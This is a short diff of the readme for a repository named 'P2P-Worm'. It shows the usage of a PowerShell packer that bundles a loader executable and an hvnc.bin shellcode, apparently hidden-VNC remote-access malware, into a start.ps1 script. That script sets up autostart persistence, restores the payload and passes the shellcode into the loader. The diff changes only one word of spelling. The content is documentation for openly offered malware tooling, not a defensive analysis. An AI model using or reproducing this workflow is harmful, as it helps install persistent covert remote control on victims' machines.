Yuragy/P2P-Worm/readme.md

 .\packer.ps1 -LoaderPath .\loader.exe -ShellcodePath .\hvnc.bin -OutPs1 .\start.ps1
 ```

-The output is start.ps1, which sets up auto-start, restores loader.exe and the shellcode, passes the shellcode into loader.exe, and then exits.
+The output is start.ps1, which sets up autostart, restores loader.exe and the shellcode, passes the shellcode into loader.exe, and then exits.

 ### Short
 * Read shellcode from stdin fully.